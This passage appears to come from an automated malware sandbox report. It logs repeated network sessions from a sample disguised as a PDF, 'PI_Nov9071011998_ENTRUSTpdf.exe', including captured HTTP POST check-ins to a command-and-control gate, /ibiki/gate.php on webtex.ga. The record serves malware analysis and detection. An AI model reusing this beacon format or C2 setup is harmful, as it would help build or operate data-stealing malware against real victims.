                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    190192.168.2.34992947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    191192.168.2.34993047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    192192.168.2.34993147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    193192.168.2.34993247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    194192.168.2.34993347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    195192.168.2.34993447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    196192.168.2.34993547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    197192.168.2.34993647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    198192.168.2.34993747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    199192.168.2.34993847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.34971147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:29.611012936 CET67OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:29.858062029 CET68INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:46 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    20192.168.2.34972947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:36.782392025 CET93OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:36.844795942 CET93INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:54 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    200192.168.2.34993947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    201192.168.2.34994147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    202192.168.2.34994247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    203192.168.2.34994447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    204192.168.2.34994547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    205192.168.2.34994647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    206192.168.2.34994847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    207192.168.2.34994947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    208192.168.2.34995047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    209192.168.2.34995147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    21192.168.2.34973047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:38.586697102 CET94OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:38.645181894 CET95INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:55 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    210192.168.2.34995347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    211192.168.2.34995447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    212192.168.2.34995547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    213192.168.2.34995647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    214192.168.2.34995747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    215192.168.2.34995847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    216192.168.2.34995947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    217192.168.2.34996047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    218192.168.2.34996147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    219192.168.2.34996247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    22192.168.2.34973147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:38.904767990 CET96OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:38.965207100 CET96INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:56 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    220192.168.2.34996347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    221192.168.2.34996447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    222192.168.2.34996547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    223192.168.2.34996647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    224192.168.2.34996747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    225192.168.2.34996847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    226192.168.2.34996947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    227192.168.2.34997047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    228192.168.2.34997147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    229192.168.2.34997247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    23192.168.2.34973447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:39.202320099 CET98OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:39.261558056 CET98INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:56 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    230192.168.2.34997347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    231192.168.2.34997447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    232192.168.2.34997547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    233192.168.2.34997647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    234192.168.2.34997747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    235192.168.2.34997847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    236192.168.2.34997947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    237192.168.2.34998047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    238192.168.2.34998147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    239192.168.2.34998247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    24192.168.2.34973547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:39.538012981 CET110OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:39.596359015 CET111INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:56 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    240192.168.2.34998347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    241192.168.2.34998447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    242192.168.2.34998547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    243192.168.2.34998647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    244192.168.2.34998747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    245192.168.2.34998847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    246192.168.2.34998947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    247192.168.2.34999047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    248192.168.2.34999147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    249192.168.2.34999247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    25192.168.2.34973647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:39.856527090 CET114OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:39.914695024 CET114INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:57 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    250192.168.2.34999347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    251192.168.2.34999547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    252192.168.2.34999647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    253192.168.2.34999747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    254192.168.2.34999947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    255192.168.2.35000047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    256192.168.2.35000147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    257192.168.2.35000247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    258192.168.2.35000347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    259192.168.2.35000447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    26192.168.2.34973947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:40.172331095 CET120OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:40.234574080 CET123INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:57 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    260192.168.2.35000547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    261192.168.2.35000647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    262192.168.2.35000747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    263192.168.2.35000847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    264192.168.2.35000947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    265192.168.2.35001047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    266192.168.2.35001147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    267192.168.2.35001247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    268192.168.2.35001347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    269192.168.2.35001447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    27192.168.2.34974047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:40.464315891 CET128OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:40.524907112 CET129INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:57 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    270192.168.2.35001547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    271192.168.2.35001647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    272192.168.2.35001747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    273192.168.2.35001847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    274192.168.2.35001947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    275192.168.2.35002047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    276192.168.2.35002147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    277192.168.2.35002247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    278192.168.2.35002347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    279192.168.2.35002447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    28192.168.2.34974247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:40.771995068 CET131OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:40.829597950 CET132INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    280192.168.2.35002547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
